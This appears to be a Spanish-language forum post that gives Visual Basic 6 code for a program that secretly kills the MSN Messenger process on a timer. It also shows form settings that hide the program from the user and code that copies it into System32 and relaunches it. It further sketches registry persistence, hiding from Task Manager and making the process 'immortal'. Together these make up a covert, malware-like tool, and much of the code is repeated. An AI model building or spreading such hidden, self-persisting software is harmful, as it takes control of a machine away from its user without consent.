Primero las funciones para buscar un proceso cada X milisegundos y si existe obtener el PID y Matarlo
Citar
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Declare Function ProcessFirst Lib "kernel32" Alias "Process32First" (ByVal hSnapshot As Long, uProcess As PROCESSENTRY32) As Long
Private Declare Function ProcessNext Lib "kernel32" Alias "Process32Next" (ByVal hSnapshot As Long, uProcess As PROCESSENTRY32) As Long
Private Declare Function CreateToolhelpSnapshot Lib "kernel32" Alias "CreateToolhelp32Snapshot" (ByVal lFlags As Long, lProcessID As Long) As Long
Private Declare Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal lFlags As Long, ByVal lProcessID As Long) As Long
Private Declare Function Process32First Lib "kernel32" (ByVal hSnapshot As Long, uProcess As PROCESSENTRY32) As Long
Private Declare Function Process32Next Lib "kernel32" (ByVal hSnapshot As Long, uProcess As PROCESSENTRY32) As Long
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long
Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long
Private Const PROCESS_TERMINATE As Long = &H1
Private Processes(150) As Long
Private Type PROCESSENTRY32
dwSize As Long
cntUsage As Long
th32ProcessID As Long
th32DefaultHeapID As Long
th32ModuleID As Long
cntThreads As Long
th32ParentProcessID As Long
pcPriClassBase As Long
dwFlags As Long
szexeFile As String * 260
End Type
Dim ProcesoXPID As String
'Busca una cadena (Nombre del ejecutable) para saber si esta en ejecucion.
Function BuscarProcesoX(ProcesoX As String) As String
Dim uProcess As PROCESSENTRY32
Dim rProcessFound As Long
Dim hSnapshot As Long
Dim szProcesoX As String
Dim myProcess As Long
Dim i As Integer
On Error Resume Next
Const TH32CS_SNAPPROCESS As Long = 2&
BuscarProcesoX = False
uProcess.dwSize = Len(uProcess)
hSnapshot = CreateToolhelpSnapshot(TH32CS_SNAPPROCESS, 0&)
rProcessFound = ProcessFirst(hSnapshot, uProcess)
Do While rProcessFound
i = InStr(1, uProcess.szexeFile, Chr(0))
szProcesoX = LCase$(Left$(uProcess.szexeFile, i - 1))
If Right$(szProcesoX, Len(ProcesoX)) = LCase$(ProcesoX) Then
BuscarProcesoX = True
Call CloseHandle(myProcess)
ProcesoXPID = uProcess.th32ProcessID
End If
rProcessFound = ProcessNext(hSnapshot, uProcess)
Loop
Call CloseHandle(hSnapshot)
End Function
'Mata el proceso pasandole el PID
Function TerminarProcesoX(ProcesoX As String)
Dim ProcHandle As Long
ProcHandle = OpenProcess(PROCESS_TERMINATE, False, CLng(ProcesoX))
TerminateProcess ProcHandle, 0
CloseHandle ProcHandle
End Function
'Busca el proceso, si existe, lo mata
Private Sub Timer1_Timer()
If BuscarProcesoX("msnmsgr.exe") = True Then
TerminarProcesoX ProcesoXPID
End If
End Sub
Private Declare Function ProcessFirst Lib "kernel32" Alias "Process32First" (ByVal hSnapshot As Long, uProcess As PROCESSENTRY32) As Long
Private Declare Function ProcessNext Lib "kernel32" Alias "Process32Next" (ByVal hSnapshot As Long, uProcess As PROCESSENTRY32) As Long
Private Declare Function CreateToolhelpSnapshot Lib "kernel32" Alias "CreateToolhelp32Snapshot" (ByVal lFlags As Long, lProcessID As Long) As Long
Private Declare Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal lFlags As Long, ByVal lProcessID As Long) As Long
Private Declare Function Process32First Lib "kernel32" (ByVal hSnapshot As Long, uProcess As PROCESSENTRY32) As Long
Private Declare Function Process32Next Lib "kernel32" (ByVal hSnapshot As Long, uProcess As PROCESSENTRY32) As Long
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long
Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long
Private Const PROCESS_TERMINATE As Long = &H1
Private Processes(150) As Long
Private Type PROCESSENTRY32
dwSize As Long
cntUsage As Long
th32ProcessID As Long
th32DefaultHeapID As Long
th32ModuleID As Long
cntThreads As Long
th32ParentProcessID As Long
pcPriClassBase As Long
dwFlags As Long
szexeFile As String * 260
End Type
Dim ProcesoXPID As String
'Busca una cadena (Nombre del ejecutable) para saber si esta en ejecucion.
Function BuscarProcesoX(ProcesoX As String) As String
Dim uProcess As PROCESSENTRY32
Dim rProcessFound As Long
Dim hSnapshot As Long
Dim szProcesoX As String
Dim myProcess As Long
Dim i As Integer
On Error Resume Next
Const TH32CS_SNAPPROCESS As Long = 2&
BuscarProcesoX = False
uProcess.dwSize = Len(uProcess)
hSnapshot = CreateToolhelpSnapshot(TH32CS_SNAPPROCESS, 0&)
rProcessFound = ProcessFirst(hSnapshot, uProcess)
Do While rProcessFound
i = InStr(1, uProcess.szexeFile, Chr(0))
szProcesoX = LCase$(Left$(uProcess.szexeFile, i - 1))
If Right$(szProcesoX, Len(ProcesoX)) = LCase$(ProcesoX) Then
BuscarProcesoX = True
Call CloseHandle(myProcess)
ProcesoXPID = uProcess.th32ProcessID
End If
rProcessFound = ProcessNext(hSnapshot, uProcess)
Loop
Call CloseHandle(hSnapshot)
End Function
'Mata el proceso pasandole el PID
Function TerminarProcesoX(ProcesoX As String)
Dim ProcHandle As Long
ProcHandle = OpenProcess(PROCESS_TERMINATE, False, CLng(ProcesoX))
TerminateProcess ProcHandle, 0
CloseHandle ProcHandle
End Function
'Busca el proceso, si existe, lo mata
Private Sub Timer1_Timer()
If BuscarProcesoX("msnmsgr.exe") = True Then
TerminarProcesoX ProcesoXPID
End If
End Sub
Dejar no visible nuestra aplicacion
Que el usuario no pueda verla
Citar
Appearance = 0-Flat
Caption = ""
ClipControls = False
ControlBox = False
Enabled = False
Hight = 1
MaxButton = False
MinButton = False
Moveable = False
NavigateMenus = False
ShowInTaskBar = False
Visible = False
Width = 1
Top = -9999
Left = -9999
Caption = ""
ClipControls = False
ControlBox = False
Enabled = False
Hight = 1
MaxButton = False
MinButton = False
Moveable = False
NavigateMenus = False
ShowInTaskBar = False
Visible = False
Width = 1
Top = -9999
Left = -9999
Cipiarce en System32, registro, ocultarce del TaskManager y hacer proceso "inmortal"
Como no voy a hacer apologia a la programacion de virus no voy a mostrar ningun tipo de codigo en el foro publico sobre estas funciones.
Copiarce en sustem32 es tan facil como:
Citar
If app.path <> Get_System32Dir then
Copy app.path & "\MyName.exe", Get_System32Dir & "\MyName.exe"
Shell Get_System32Dir & "\MyName.exe"
Unload Me
End if
Function Get_System32Dir()
'A tu imaginacion
End Function
Copy app.path & "\MyName.exe", Get_System32Dir & "\MyName.exe"
Shell Get_System32Dir & "\MyName.exe"
Unload Me
End if
Function Get_System32Dir()
'A tu imaginacion
End Function
Cipiarce en el registro:
Alguna vez he dejado alguna funcion por ahi que sensillamente al ejecutarce y terminar llama a la funcion asignandole el valor de la cadena del registro, usando modulo, no Objetos.
Para ocultarce del TaskManager:
Deje un modulo por el foro hace poco
Para hacer proceso "inmortal":
Usen su imaginacion
*Ninguna funcion de infeccion, ni hook,ni packer ni nada parecido, es inecesario.